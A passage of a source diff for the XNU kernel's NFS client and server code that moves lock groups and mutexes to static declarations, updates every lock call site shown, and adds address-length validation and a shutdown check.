lck_mtx_lock(&nfs_node_hash_mutex); for (i = 0; i <= nfsnodehash; i++) { LIST_FOREACH(np, &nfsnodehashtbl[i], n_hash) { #ifdef DODEBUG @@ -1446,7 +1449,7 @@ nfs_mount_is_dirty(mount_t mp) } } out: - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); #ifdef DODEBUG microuptime(&then); timersub(&then, &now, &diff); diff --git a/bsd/nfs/nfs_serv.c b/bsd/nfs/nfs_serv.c index 31db576a6..0346a7502 100644 --- a/bsd/nfs/nfs_serv.c +++ b/bsd/nfs/nfs_serv.c @@ -116,12 +116,12 @@ int nfsd_thread_count = 0; int nfsd_thread_max = 0; -lck_grp_t *nfsd_lck_grp; -lck_mtx_t *nfsd_mutex; +static LCK_GRP_DECLARE(nfsd_lck_grp, "nfsd"); +LCK_MTX_DECLARE(nfsd_mutex, &nfsd_lck_grp); struct nfsd_head nfsd_head, nfsd_queue; -lck_grp_t *nfsrv_slp_rwlock_group; -lck_grp_t *nfsrv_slp_mutex_group; +LCK_GRP_DECLARE(nfsrv_slp_rwlock_group, "nfsrv-slp-rwlock"); +LCK_GRP_DECLARE(nfsrv_slp_mutex_group, "nfsrv-slp-mutex"); struct nfsrv_sockhead nfsrv_socklist, nfsrv_sockwg, nfsrv_sockwait, nfsrv_sockwork; struct nfsrv_sock *nfsrv_udpsock = NULL; @@ -132,15 +132,15 @@ struct nfsrv_expfs_list nfsrv_exports; struct nfsrv_export_hashhead *nfsrv_export_hashtbl = NULL; int nfsrv_export_hash_size = NFSRVEXPHASHSZ; u_long nfsrv_export_hash; -lck_grp_t *nfsrv_export_rwlock_group; -lck_rw_t nfsrv_export_rwlock; +static LCK_GRP_DECLARE(nfsrv_export_rwlock_group, "nfsrv-export-rwlock"); +LCK_RW_DECLARE(nfsrv_export_rwlock, &nfsrv_export_rwlock_group); #if CONFIG_FSE /* NFS server file modification event generator */ struct nfsrv_fmod_hashhead *nfsrv_fmod_hashtbl; u_long nfsrv_fmod_hash; -lck_grp_t *nfsrv_fmod_grp; -lck_mtx_t *nfsrv_fmod_mutex; +static LCK_GRP_DECLARE(nfsrv_fmod_grp, "nfsrv_fmod"); +LCK_MTX_DECLARE(nfsrv_fmod_mutex, &nfsrv_fmod_grp); static int nfsrv_fmod_timer_on = 0; int nfsrv_fsevents_enabled = 1; #endif @@ -158,7 +158,7 @@ uint32_t nfsrv_user_stat_enabled = 1; uint32_t nfsrv_user_stat_node_count = 0; uint32_t nfsrv_user_stat_max_idle_sec = NFSRV_USER_STAT_DEF_IDLE_SEC; uint32_t nfsrv_user_stat_max_nodes = NFSRV_USER_STAT_DEF_MAX_NODES; -lck_grp_t *nfsrv_active_user_mutex_group; +LCK_GRP_DECLARE(nfsrv_active_user_mutex_group, "nfs-active-user-mutex"); int nfsrv_wg_delay = NFSRV_WGATHERDELAY * 1000; int nfsrv_wg_delay_v3 = 0; @@ -203,31 +203,12 @@ nfsrv_init(void) printf("struct nfsrv_sock bloated (> %dbytes)\n", NFS_SVCALLOC); } - /* init nfsd mutex */ - nfsd_lck_grp = lck_grp_alloc_init("nfsd", LCK_GRP_ATTR_NULL); - nfsd_mutex = lck_mtx_alloc_init(nfsd_lck_grp, LCK_ATTR_NULL); - - /* init slp rwlock */ - nfsrv_slp_rwlock_group = lck_grp_alloc_init("nfsrv-slp-rwlock", LCK_GRP_ATTR_NULL); - nfsrv_slp_mutex_group = lck_grp_alloc_init("nfsrv-slp-mutex", LCK_GRP_ATTR_NULL); - /* init export data structures */ LIST_INIT(&nfsrv_exports); - nfsrv_export_rwlock_group = lck_grp_alloc_init("nfsrv-export-rwlock", LCK_GRP_ATTR_NULL); - lck_rw_init(&nfsrv_export_rwlock, nfsrv_export_rwlock_group, LCK_ATTR_NULL); - - /* init active user list mutex structures */ - nfsrv_active_user_mutex_group = lck_grp_alloc_init("nfs-active-user-mutex", LCK_GRP_ATTR_NULL); - - /* init nfs server request cache mutex */ - nfsrv_reqcache_lck_grp = lck_grp_alloc_init("nfsrv_reqcache", LCK_GRP_ATTR_NULL); - nfsrv_reqcache_mutex = lck_mtx_alloc_init(nfsrv_reqcache_lck_grp, LCK_ATTR_NULL); #if CONFIG_FSE /* init NFS server file modified event generation */ nfsrv_fmod_hashtbl = hashinit(NFSRVFMODHASHSZ, M_TEMP, &nfsrv_fmod_hash); - nfsrv_fmod_grp = lck_grp_alloc_init("nfsrv_fmod", LCK_GRP_ATTR_NULL); - nfsrv_fmod_mutex = lck_mtx_alloc_init(nfsrv_fmod_grp, LCK_ATTR_NULL); #endif /* initialize NFS server timer callouts */ @@ -1146,7 +1127,7 @@ nfsrv_fmod_timer(__unused void *param0, __unused void *param1) int i, fmod_fire; LIST_INIT(&firehead); - lck_mtx_lock(nfsrv_fmod_mutex); + lck_mtx_lock(&nfsrv_fmod_mutex); again: clock_get_uptime(&timenow); clock_interval_to_deadline(nfsrv_fmod_pendtime, 1000 * 1000, @@ -1194,7 +1175,7 @@ again: } if (fmod_fire) { - lck_mtx_unlock(nfsrv_fmod_mutex); + lck_mtx_unlock(&nfsrv_fmod_mutex); /* * Fire off the content modified fsevent for each * entry and free it. @@ -1211,7 +1192,7 @@ again: LIST_REMOVE(fp, fm_link); FREE(fp, M_TEMP); } - lck_mtx_lock(nfsrv_fmod_mutex); + lck_mtx_lock(&nfsrv_fmod_mutex); nfsrv_fmod_pending -= fmod_fire; goto again; } @@ -1234,7 +1215,7 @@ again: nfs_interval_timer_start(nfsrv_fmod_timer_call, interval); } - lck_mtx_unlock(nfsrv_fmod_mutex); + lck_mtx_unlock(&nfsrv_fmod_mutex); } /* @@ -1250,7 +1231,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx) struct nfsrv_fmod *fp; struct nfsrv_fmod_hashhead *head; - lck_mtx_lock(nfsrv_fmod_mutex); + lck_mtx_lock(&nfsrv_fmod_mutex); /* * Compute the time in the future when the @@ -1271,7 +1252,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx) LIST_REMOVE(fp, fm_link); LIST_INSERT_HEAD(head, fp, fm_link); } - lck_mtx_unlock(nfsrv_fmod_mutex); + lck_mtx_unlock(&nfsrv_fmod_mutex); return; } } @@ -1306,7 +1287,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx) nfsrv_fmod_pendtime); } done: - lck_mtx_unlock(nfsrv_fmod_mutex); + lck_mtx_unlock(&nfsrv_fmod_mutex); return; } #endif /* CONFIG_FSE */ @@ -1856,7 +1837,7 @@ loop1: * * Add/Remove the socket in the nfsrv_sockwg queue as needed. */ - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); if (slp->ns_wgtime) { if (slp->ns_wgq.tqe_next == SLPNOLIST) { TAILQ_INSERT_HEAD(&nfsrv_sockwg, slp, ns_wgq); @@ -1870,7 +1851,7 @@ loop1: TAILQ_REMOVE(&nfsrv_sockwg, slp, ns_wgq); slp->ns_wgq.tqe_next = SLPNOLIST; } - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); return 0; } @@ -1950,7 +1931,7 @@ nfsrv_wg_timer(__unused void *param0, __unused void *param1) cur_usec = now.tv_sec * 1000000 + now.tv_usec; next_usec = cur_usec + (NFSRV_WGATHERDELAY * 1000); - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); TAILQ_FOREACH(slp, &nfsrv_sockwg, ns_wgq) { if (slp->ns_wgtime) { writes_pending++; @@ -1969,10 +1950,10 @@ nfsrv_wg_timer(__unused void *param0, __unused void *param1) if (writes_pending == 0) { nfsrv_wg_timer_on = 0; - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); return; } - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); /* * Return the number of msec to wait again diff --git a/bsd/nfs/nfs_socket.c b/bsd/nfs/nfs_socket.c index eaca59ada..435bbb782 100644 --- a/bsd/nfs/nfs_socket.c +++ b/bsd/nfs/nfs_socket.c @@ -90,6 +90,7 @@ #include #include +#include #include #include #include @@ -114,6 +115,11 @@ #define NFS_SOCK_DBG(...) NFS_DBG(NFS_FAC_SOCK, 7, ## __VA_ARGS__) #define NFS_SOCK_DUMP_MBUF(msg, mb) if (NFS_IS_DBG(NFS_FAC_SOCK, 15)) nfs_dump_mbuf(__func__, __LINE__, (msg), (mb)) +#ifndef SUN_LEN +#define SUN_LEN(su) \ + (sizeof(*(su)) - sizeof((su)->sun_path) + strnlen((su)->sun_path, sizeof((su)->sun_path))) +#endif /* SUN_LEN */ + /* XXX */ boolean_t current_thread_aborted(void); kern_return_t thread_terminate(thread_t); @@ -552,17 +558,27 @@ nfs_socket_create( switch (sa->sa_family) { case AF_INET: + if (sa->sa_len != sizeof(struct sockaddr_in)) { + return EINVAL; + } + sinaddr = &((struct sockaddr_in*)sa)->sin_addr; + if (inet_ntop(sa->sa_family, sinaddr, naddr, sizeof(naddr)) != naddr) { + strlcpy(naddr, "", sizeof(naddr)); + } + break; case AF_INET6: - if (sa->sa_family == AF_INET) { - sinaddr = &((struct sockaddr_in*)sa)->sin_addr; - } else { - sinaddr = &((struct sockaddr_in6*)sa)->sin6_addr; + if (sa->sa_len != sizeof(struct sockaddr_in6)) { + return EINVAL; } + sinaddr = &((struct sockaddr_in6*)sa)->sin6_addr; if (inet_ntop(sa->sa_family, sinaddr, naddr, sizeof(naddr)) != naddr) { strlcpy(naddr, "", sizeof(naddr)); } break; case AF_LOCAL: + if (sa->sa_len != sizeof(struct sockaddr_un) && sa->sa_len != SUN_LEN((struct sockaddr_un *)sa)) { + return EINVAL; + } strlcpy(naddr, ((struct sockaddr_un *)sa)->sun_path, sizeof(naddr)); break; default: @@ -586,7 +602,7 @@ nfs_socket_create( } return ENOMEM; } - lck_mtx_init(&nso->nso_lock, nfs_request_grp, LCK_ATTR_NULL); + lck_mtx_init(&nso->nso_lock, &nfs_request_grp, LCK_ATTR_NULL); nso->nso_sotype = sotype; if (nso->nso_sotype == SOCK_STREAM) { nfs_rpc_record_state_init(&nso->nso_rrs); @@ -673,7 +689,7 @@ nfs_socket_destroy(struct nfs_socket *nso) if (nso->nso_sotype == SOCK_STREAM) { nfs_rpc_record_state_cleanup(&nso->nso_rrs); } - lck_mtx_destroy(&nso->nso_lock, nfs_request_grp); + lck_mtx_destroy(&nso->nso_lock, &nfs_request_grp); if (nso->nso_saddr) { FREE(nso->nso_saddr, M_SONAME); } @@ -1988,7 +2004,7 @@ nfs_reconnect(struct nfsmount *nmp) * as needing a resend. (Though nfs_need_reconnect() probably * marked them all already.) */ - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); TAILQ_FOREACH(rq, &nfs_reqq, r_chain) { if (rq->r_nmp == nmp) { lck_mtx_lock(&rq->r_mtx); @@ -2003,7 +2019,7 @@ nfs_reconnect(struct nfsmount *nmp) lck_mtx_unlock(&rq->r_mtx); } } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return 0; } @@ -2061,7 +2077,7 @@ nfs_need_reconnect(struct nfsmount *nmp) * Loop through outstanding request list and * mark all requests as needing a resend. */ - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); TAILQ_FOREACH(rq, &nfs_reqq, r_chain) { if (rq->r_nmp == nmp) { lck_mtx_lock(&rq->r_mtx); @@ -2076,7 +2092,7 @@ nfs_need_reconnect(struct nfsmount *nmp) lck_mtx_unlock(&rq->r_mtx); } } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); } @@ -2445,7 +2461,7 @@ nfs4_mount_callback_setup(struct nfsmount *nmp) int error, on = 1; in_port_t port; - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if (nfs4_cb_id == 0) { TAILQ_INIT(&nfs4_cb_mounts); TAILQ_INIT(&nfs4_cb_socks); @@ -2459,7 +2475,7 @@ nfs4_mount_callback_setup(struct nfsmount *nmp) TAILQ_INSERT_HEAD(&nfs4_cb_mounts, nmp, nm_cblink); if (nfs4_cb_so) { - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return; } @@ -2575,7 +2591,7 @@ ipv6_bind_again: fail: if (error) { nfs4_cb_so = nfs4_cb_so6 = NULL; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); if (so) { sock_shutdown(so, SHUT_RDWR); sock_close(so); @@ -2585,7 +2601,7 @@ fail: sock_close(so6); } } else { - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); } } @@ -2604,19 +2620,19 @@ nfs4_mount_callback_shutdown(struct nfsmount *nmp) struct nfs4_cb_sock_list cb_socks; struct timespec ts = { .tv_sec = 1, .tv_nsec = 0 }; - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if (nmp->nm_cbid == 0) { - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return; } TAILQ_REMOVE(&nfs4_cb_mounts, nmp, nm_cblink); /* wait for any callbacks in progress to complete */ while (nmp->nm_cbrefs) { - msleep(&nmp->nm_cbrefs, nfs_global_mutex, PSOCK, "cbshutwait", &ts); + msleep(&nmp->nm_cbrefs, &nfs_global_mutex, PSOCK, "cbshutwait", &ts); } nmp->nm_cbid = 0; if (--nfs4_cb_so_usecount) { - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return; } so = nfs4_cb_so; @@ -2624,7 +2640,7 @@ nfs4_mount_callback_shutdown(struct nfsmount *nmp) nfs4_cb_so = nfs4_cb_so6 = NULL; TAILQ_INIT(&cb_socks); TAILQ_CONCAT(&cb_socks, &nfs4_cb_socks, ncbs_link); - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); if (so) { sock_shutdown(so, SHUT_RDWR); sock_close(so); @@ -2654,10 +2670,10 @@ nfs4_callback_timer(__unused void *param0, __unused void *param1) struct timeval now; loop: - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if (TAILQ_EMPTY(&nfs4_cb_socks)) { nfs4_callback_timer_on = 0; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return; } microuptime(&now); @@ -2667,7 +2683,7 @@ loop: continue; } TAILQ_REMOVE(&nfs4_cb_socks, ncbsp, ncbs_link); - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); sock_shutdown(ncbsp->ncbs_so, SHUT_RDWR); sock_close(ncbsp->ncbs_so); nfs_rpc_record_state_cleanup(&ncbsp->ncbs_rrs); @@ -2677,7 +2693,7 @@ loop: nfs4_callback_timer_on = 1; nfs_interval_timer_start(nfs4_callback_timer_call, NFS4_CB_TIMER_PERIOD * 1000); - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); } /* @@ -2741,7 +2757,7 @@ nfs4_cb_accept(socket_t so, __unused void *arg, __unused int waitflag) microuptime(&now); ncbsp->ncbs_stamp = now.tv_sec; - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); /* add it to the list */ TAILQ_INSERT_HEAD(&nfs4_cb_socks, ncbsp, ncbs_link); @@ -2772,7 +2788,7 @@ nfs4_cb_accept(socket_t so, __unused void *arg, __unused int waitflag) nfs_interval_timer_start(nfs4_callback_timer_call, 500); } - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); } /* @@ -2788,14 +2804,14 @@ nfs4_cb_rcv(socket_t so, void *arg, __unused int waitflag) mbuf_t m; int error = 0, recv = 1; - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); while (ncbsp->ncbs_flags & NCBSOCK_UPCALL) { /* wait if upcall is already in progress */ ncbsp->ncbs_flags |= NCBSOCK_UPCALLWANT; - msleep(ncbsp, nfs_global_mutex, PSOCK, "cbupcall", &ts); + msleep(ncbsp, &nfs_global_mutex, PSOCK, "cbupcall", &ts); } ncbsp->ncbs_flags |= NCBSOCK_UPCALL; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); /* loop while we make error-free progress */ while (!error && recv) { @@ -2819,9 +2835,9 @@ nfs4_cb_rcv(socket_t so, void *arg, __unused int waitflag) ncbsp->ncbs_stamp = now.tv_sec; } - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); ncbsp->ncbs_flags &= ~NCBSOCK_UPCALL; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); wakeup(ncbsp); } @@ -2924,7 +2940,7 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq) goto nfsmout; } /* match the callback ID to a registered mount */ - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); TAILQ_FOREACH(nmp, &nfs4_cb_mounts, nm_cblink) { if (nmp->nm_cbid != cbid) { continue; @@ -2941,7 +2957,7 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq) if (nmp) { nmp->nm_cbrefs++; } - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); if (!nmp) { /* if no mount match, just drop socket. */ error = EPERM; @@ -3087,12 +3103,12 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq) nfsm_chain_null(&nmrep); /* drop the callback reference on the mount */ - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); nmp->nm_cbrefs--; if (!nmp->nm_cbid) { wakeup(&nmp->nm_cbrefs); } - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); break; } @@ -3857,7 +3873,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep) * Loop through the request list to match up the reply * Iff no match, just drop it. */ - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); TAILQ_FOREACH(req, &nfs_reqq, r_chain) { if (req->r_nmrep.nmc_mhead || (rxid != R_XID32(req->r_xid))) { continue; @@ -3933,7 +3949,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep) } #endif /* CONFIG_NFS_GSS */ lck_mtx_unlock(&req->r_mtx); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); /* if it's an async RPC with a callback, queue it up */ if (asyncioq) { nfs_asyncio_finish(req); @@ -3943,7 +3959,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep) if (!req) { /* not matched to a request, so drop it. */ - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); OSAddAtomic64(1, &nfsstats.rpcunexpected); mbuf_freem(mrep); } @@ -4089,7 +4105,7 @@ nfs_request_create( panic("nfs_request: invalid NFSv4 RPC request %d\n", procnum); } - lck_mtx_init(&req->r_mtx, nfs_request_grp, LCK_ATTR_NULL); + lck_mtx_init(&req->r_mtx, &nfs_request_grp, LCK_ATTR_NULL); req->r_nmp = nmp; nmp->nm_ref++; req->r_np = np; @@ -4161,12 +4177,12 @@ nfs_request_destroy(struct nfsreq *req) * Still on an async I/O queue? * %%% But which one, we may be on a local iod. */ - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); if (nmp && req->r_achain.tqe_next != NFSREQNOLIST) { TAILQ_REMOVE(&nmp->nm_iodq, req, r_achain); req->r_achain.tqe_next = NFSREQNOLIST; } - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); } lck_mtx_lock(&req->r_mtx); @@ -4233,7 +4249,7 @@ nfs_request_destroy(struct nfsreq *req) if (nmp) { nfs_mount_rele(nmp); } - lck_mtx_destroy(&req->r_mtx, nfs_request_grp); + lck_mtx_destroy(&req->r_mtx, &nfs_request_grp); if (req->r_flags & R_ALLOCATED) { NFS_ZFREE(nfs_req_zone, req); } @@ -4330,11 +4346,11 @@ nfs_request_send(struct nfsreq *req, int wait) req->r_flags |= R_SENDING; lck_mtx_unlock(&req->r_mtx); - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); nmp = req->r_nmp; if (nfs_mount_gone(nmp)) { - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return ENXIO; } @@ -4372,7 +4388,7 @@ nfs_request_send(struct nfsreq *req, int wait) nfs_interval_timer_start(nfs_request_timer_call, NFS_REQUESTDELAY); } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); /* Send the request... */ return nfs_send(req, wait); @@ -5191,16 +5207,16 @@ nfs_softterm(struct nfsreq *req) void nfs_reqdequeue(struct nfsreq *req) { - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); while (req->r_lflags & RL_BUSY) { req->r_lflags |= RL_WAITING; - msleep(&req->r_lflags, nfs_request_mutex, PSOCK, "reqdeq", NULL); + msleep(&req->r_lflags, &nfs_request_mutex, PSOCK, "reqdeq", NULL); } if (req->r_lflags & RL_QUEUED) { TAILQ_REMOVE(&nfs_reqq, req, r_chain); req->r_lflags &= ~RL_QUEUED; } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); } /* @@ -5265,11 +5281,11 @@ nfs_request_timer(__unused void *param0, __unused void *param1) TAILQ_INIT(&nfs_mount_poke_queue); restart: - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); req = TAILQ_FIRST(&nfs_reqq); if (req == NULL) { /* no requests - turn timer off */ nfs_request_timer_on = 0; - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return; } @@ -5399,7 +5415,7 @@ restart: TAILQ_REMOVE(&nfs_mount_poke_queue, nmp, nm_pokeq); } /* Release our lock state, so we can become a zombie */ - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); /* * Note nfs_mount_make zombie(nmp) must be @@ -5407,7 +5423,7 @@ restart: * work we release nm_lock in * nfs_make_mount_zombie with out acquiring any * other locks. (Later, in nfs_mount_zombie we - * will acquire nfs_request_mutex, r_mtx, + * will acquire &nfs_request_mutex, r_mtx, * nm_lock in that order). So we should not be * introducing deadlock here. We take a reference * on the mount so that its still there when we @@ -5508,7 +5524,7 @@ restart: lck_mtx_unlock(&req->r_mtx); } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); /* poke any sockets */ while ((nmp = TAILQ_FIRST(&nfs_mount_poke_queue))) { @@ -5535,6 +5551,7 @@ nfs_noremotehang(thread_t thd) * This is used to determine if we need to bail on a mount. * ETIMEDOUT is returned if there has been a soft timeout. * EINTR is returned if there is a signal pending that is not being ignored + * ESHUTDOWN is return if the system is in shutdown. * and the mount is interruptable, or if we are a thread that is in the process * of cancellation (also SIGKILL posted). */ @@ -5549,6 +5566,11 @@ nfs_sigintr(struct nfsmount *nmp, struct nfsreq *req, thread_t thd, int nmplocke return ENXIO; } + if (get_system_inshutdown()) { + NFS_SOCK_DBG("Shutdown in progress\n"); + return ESHUTDOWN; + } + if (req && (req->r_flags & R_SOFTTERM)) { return ETIMEDOUT; /* request has been terminated. */ } @@ -6685,9 +6707,9 @@ dorecs: int wake = (slp->ns_flag & SLP_WORKTODO); lck_rw_done(&slp->ns_rwlock); if (wake && nfsd_thread_count) { - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); nfsrv_wakenfsd(slp); - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); } } } diff --git a/bsd/nfs/nfs_srvcache.c b/bsd/nfs/nfs_srvcache.c index 5addbf6fb..a934d4d07 100644 --- a/bsd/nfs/nfs_srvcache.c +++ b/bsd/nfs/nfs_srvcache.c @@ -100,8 +100,8 @@ LIST_HEAD(nfsrv_reqcache_hash, nfsrvcache) * nfsrv_reqcache_hashtbl; TAILQ_HEAD(nfsrv_reqcache_lru, nfsrvcache) nfsrv_reqcache_lruhead; u_long nfsrv_reqcache_hash; -lck_grp_t *nfsrv_reqcache_lck_grp; -lck_mtx_t *nfsrv_reqcache_mutex; +static LCK_GRP_DECLARE(nfsrv_reqcache_lck_grp, "nfsrv_reqcache"); +LCK_MTX_DECLARE(nfsrv_reqcache_mutex, &nfsrv_reqcache_lck_grp); /* * Static array that defines which nfs rpc's are nonidempotent @@ -164,11 +164,11 @@ nfsrv_initcache(void) return; } - lck_mtx_lock(nfsrv_reqcache_mutex); + lck_mtx_lock(&nfsrv_reqcache_mutex); /* init nfs server request cache hash table */ nfsrv_reqcache_hashtbl = hashinit(nfsrv_reqcache_size, M_NFSD, &nfsrv_reqcache_hash); TAILQ_INIT(&nfsrv_reqcache_lruhead); - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); } /* @@ -239,7 +239,7 @@ nfsrv_getcache( if (!nd->nd_nam2) { return RC_DOIT; } - lck_mtx_lock(nfsrv_reqcache_mutex); + lck_mtx_lock(&nfsrv_reqcache_mutex); loop: for (rp = NFSRCHASH(nd->nd_retxid)->lh_first; rp != 0; rp = rp->rc_hash.le_next) { @@ -247,7 +247,7 @@ loop: netaddr_match(rp->rc_family, &rp->rc_haddr, nd->nd_nam)) { if ((rp->rc_flag & RC_LOCKED) != 0) { rp->rc_flag |= RC_WANTED; - msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); + msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); goto loop; } rp->rc_flag |= RC_LOCKED; @@ -293,7 +293,7 @@ loop: rp->rc_flag &= ~RC_WANTED; wakeup(rp); } - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); return ret; } } @@ -315,12 +315,12 @@ loop: if (!rp) { /* no entry to reuse? */ /* OK, we just won't be able to cache this request */ - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); return RC_DOIT; } while ((rp->rc_flag & RC_LOCKED) != 0) { rp->rc_flag |= RC_WANTED; - msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); + msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); rp = nfsrv_reqcache_lruhead.tqh_first; } rp->rc_flag |= RC_LOCKED; @@ -365,7 +365,7 @@ loop: rp->rc_flag &= ~RC_WANTED; wakeup(rp); } - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); return RC_DOIT; } @@ -384,7 +384,7 @@ nfsrv_updatecache( if (!nd->nd_nam2) { return; } - lck_mtx_lock(nfsrv_reqcache_mutex); + lck_mtx_lock(&nfsrv_reqcache_mutex); loop: for (rp = NFSRCHASH(nd->nd_retxid)->lh_first; rp != 0; rp = rp->rc_hash.le_next) { @@ -392,7 +392,7 @@ loop: netaddr_match(rp->rc_family, &rp->rc_haddr, nd->nd_nam)) { if ((rp->rc_flag & RC_LOCKED) != 0) { rp->rc_flag |= RC_WANTED; - msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); + msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); goto loop; } rp->rc_flag |= RC_LOCKED; @@ -430,11 +430,11 @@ loop: rp->rc_flag &= ~RC_WANTED; wakeup(rp); } - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); return; } } - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); } /* @@ -445,7 +445,7 @@ nfsrv_cleancache(void) { struct nfsrvcache *rp, *nextrp; - lck_mtx_lock(nfsrv_reqcache_mutex); + lck_mtx_lock(&nfsrv_reqcache_mutex); for (rp = nfsrv_reqcache_lruhead.tqh_first; rp != 0; rp = nextrp) { nextrp = rp->rc_lru.tqe_next; LIST_REMOVE(rp, rc_hash); @@ -454,7 +454,7 @@ nfsrv_cleancache(void) } nfsrv_reqcache_count = 0; FREE(nfsrv_reqcache_hashtbl, M_TEMP); - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); } #endif /* CONFIG_NFS_SERVER */ diff --git a/bsd/nfs/nfs_subs.c b/bsd/nfs/nfs_subs.c index b4be3353f..a58fc7869 100644 --- a/bsd/nfs/nfs_subs.c +++ b/bsd/nfs/nfs_subs.c @@ -1040,7 +1040,7 @@ nfs_get_xid(uint64_t *xidp) { struct timeval tv; - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); if (!nfs_xid) { /* * Derive initial xid from system time. @@ -1059,7 +1059,7 @@ nfs_get_xid(uint64_t *xidp) nfs_xid++; } *xidp = nfs_xid + (nfs_xidwrap << 32); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); } /* @@ -2755,13 +2755,14 @@ nfsrv_hang_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) struct radix_node *rn; struct sockaddr *saddr, *smask; struct domain *dom; - size_t i; + size_t i, ss_minsize; int error; unsigned int net; user_addr_t uaddr; kauth_cred_t cred; uaddr = unxa->nxa_nets; + ss_minsize = sizeof(((struct sockaddr_storage *)0)->ss_len) + sizeof(((struct sockaddr_storage *)0)->ss_family); for (net = 0; net 